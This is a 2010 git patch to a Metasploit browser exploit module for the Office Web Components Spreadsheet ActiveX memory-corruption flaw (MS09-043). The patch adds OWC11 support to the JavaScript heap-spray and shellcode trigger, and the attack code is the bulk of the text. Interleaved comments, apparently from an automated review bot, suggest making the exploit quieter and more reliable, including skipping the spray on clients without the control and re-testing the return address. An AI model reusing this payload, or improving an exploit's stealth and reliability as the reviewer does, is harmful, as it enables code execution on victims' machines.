From 786ccb3d5f1a51bd244cddafa8b12d91e093ab2c Mon Sep 17 00:00:00 2001
From: Joshua Drake
Date: Tue, 20 Jul 2010 06:24:19 +0000
Subject: [PATCH] add support for OWC11 (from DSR!)

git-svn-id: file:///home/svn/framework3/trunk@9883 4d416f70-5f16-0410-b530-b9f4589650da
---
 .../windows/browser/ms09_043_owc_msdso.rb | 81 ++++++++++---------
 1 file changed, 45 insertions(+), 36 deletions(-)

diff --git a/modules/exploits/windows/browser/ms09_043_owc_msdso.rb b/modules/exploits/windows/browser/ms09_043_owc_msdso.rb
index f4f3855039..a1959251e7 100644
--- a/modules/exploits/windows/browser/ms09_043_owc_msdso.rb
+++ b/modules/exploits/windows/browser/ms09_043_owc_msdso.rb
@@ -21,19 +21,21 @@ class Metasploit3 < Msf::Exploit::Remote
 super(update_info(info,
 'Name' => 'Microsoft OWC Spreadsheet msDataSourceObject Memory Corruption',
 'Description' => %q{
- This module exploits a memory corruption vulnerability within the Office Web Component
- Spreadsheet ActiveX control. This module was based on an exploit found in
- the wild.
+ This module exploits a memory corruption vulnerability within versions 10 and 11 of
+ the Office Web Component Spreadsheet ActiveX control. This module was based on
+ an exploit found in the wild.
 },
 'License' => MSF_LICENSE,
- 'Author' => ['unknown','hdm'],
+ 'Author' => [ 'unknown', 'hdm', 'Ahmed Obied', 'DSR! ' ],
 'Version' => '$Revision$',
 'References' =>
 [
 [ 'CVE', '2009-1136' ],
- [ 'OSVDB', '55806'],
+ [ 'OSVDB', '55806' ],
 [ 'MSB', 'MS09-043' ],
- [ 'URL', 'http://xeye.us/blog/2009/07/one-0day/' ],
+ [ 'URL', 'http://ahmed.obied.net/software/code/exploits/ie_owc.py' ],
+ [ 'URL', 'http://www.exploit-db.com/exploits/9163/' ],
+ # broken: [ 'URL', 'http://xeye.us/blog/2009/07/one-0day/' ],
 [ 'URL', 'http://www.microsoft.com/technet/security/advisory/973472.mspx' ],
 ],
 'DefaultOptions' =>
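Review bot: The new `'Author'` entry `'DSR! '` carries a trailing space inside the string literal, which is emitted verbatim wherever the module's author list is printed; it should read `'DSR!'`, matching the other entries. Keeping the dead xeye.us reference as a `# broken:` comment is reasonable provenance, but the subject line credits DSR! for the OWC11 support while the description only says "based on an exploit found in the wild" — a short phrase such as "OWC11 instantiation contributed by DSR!" in the description would tie the credit to the change. The `super(update_info(info,` call opens in this hunk and continues past its last line.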
@@ -49,7 +51,7 @@ class Metasploit3 < Msf::Exploit::Remote
 'Platform' => 'win',
 'Targets' =>
 [
- [ 'Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0', { 'Ret' => 0x0C0C0C0C } ]
+ [ 'Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0', { 'Ret' => 0x0C0C0C0C } ] # other exploits use 0x0b0c0b0c
 ],
 'DisclosureDate' => 'Jul 13 2009',
 'DefaultTarget' => 0))
@@ -74,48 +76,55 @@ class Metasploit3 < Msf::Exploit::Remote
 retaddr = Rex::Text.to_unescape([target.ret].pack('V'))
 js = %Q|
+var xshellcode = unescape("#{shellcode}");
- var xshellcode = unescape("#{shellcode}");
+var xarray = new Array();
+var xls = 0x81000-(xshellcode.length*2);
+var xbigblock = unescape("#{retaddr}");
- var xarray = new Array();
- var xls = 0x81000-(xshellcode.length*2);
- var xbigblock = unescape("#{retaddr}");
+while( xbigblock.length < xls / 2) { xbigblock += xbigblock; }
+var xlh = xbigblock.substring(0, xls / 2);
+delete xbigblock;
- while( xbigblock.length < xls / 2) { xbigblock += xbigblock; }
- var xlh = xbigblock.substring(0, xls / 2);
- delete xbigblock;
+for(xi=0; xi<0x99*2; xi++) {
+ xarray[xi] = xlh + xlh + xshellcode;
+}
- for(xi=0; xi<0x99*2; xi++) {
- xarray[xi] = xlh + xlh + xshellcode;
- }
+CollectGarbage();
- CollectGarbage();
+var xobj;
+try {
+ xobj = new ActiveXObject("OWC10.Spreadsheet");
+} catch(err) {
+ try {
+ xobj = new ActiveXObject("OWC11.Spreadsheet");
+ } catch(err) {
+ }
+}
- var xobj = new ActiveXObject("OWC10.Spreadsheet");
+xe = new Array();
+xe.push(1);
+xe.push(2);
+xe.push(0);
+xe.push(window);
- xe = new Array();
- xe.push(1);
- xe.push(2);
- xe.push(0);
- xe.push(window);
+for(xi=0; xi < xe.length; xi++){
+ for(xj=0; xj<10; xj++){
+ try { xobj.Evaluate(xe[xi]); } catch(e) { }
+ }
+}
- for(xi=0; xi < xe.length; xi++){
- for(xj=0; xj<10; xj++){
- try { xobj.Evaluate(xe[xi]); } catch(e) { }
- }
- }
+window.status = xe[3] + '';
- window.status = xe[3] + '';
-
- for(xj=0; xj<10; xj++){
- try{ xobj.msDataSourceObject(xe[3]); } catch(e) { }
- }
- |
+for(xj=0; xj<10; xj++){
+ try{ xobj.msDataSourceObject(xe[3]); } catch(e) { }
+}
+|
 # Obfuscate it up a bit
 js = obfuscate_js(js,
 'Symbols' => {
- 'Variables' => %W{ xshellcode xarray xls xbigblock xlh xi xobj xe xj}
+ 'Variables' => %W{ xshellcode xarray xls xbigblock xlh xi xobj xe xj err}
 }
 ).to_s
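Review bot: When neither `OWC10.Spreadsheet` nor `OWC11.Spreadsheet` can be instantiated, the new nested try/catch leaves `xobj` undefined, and every later `xobj.Evaluate(...)` and `xobj.msDataSourceObject(...)` call then throws a TypeError that the existing empty `catch(e) { }` blocks swallow — so the page fails silently, but only after the `0x99*2` `xarray` entries (each two `xlh` halves of `xls / 2` characters plus the shellcode, on the order of a megabyte apiece if IE stores them as UTF-16) have already been sprayed into the victim's browser. Probing for the control before the spray and skipping the rest of the script when `xobj` is undefined would avoid that wasted, user-visible memory pressure on clients that have neither control; this presumes the instantiation order does not disturb the heap layout the `Ret` of 0x0C0C0C0C relies on, which is worth re-testing against both controls. The inner `catch(err)` shadows the outer binding of the same name, which is harmless but a distinct name would keep the obfuscator's `err` entry unambiguous. The `js = %Q|...|` string is complete within the hunk, but the enclosing Ruby method begins before line 76 and is not shown.
```javascript
var xobj;
try { xobj = new ActiveXObject("OWC10.Spreadsheet"); }
catch(err) { try { xobj = new ActiveXObject("OWC11.Spreadsheet"); } catch(err2) { } }
if (xobj) {
    // … unchanged: heap spray (xshellcode / xarray / xlh), CollectGarbage, xe array, Evaluate loop, window.status, msDataSourceObject loop …
}
```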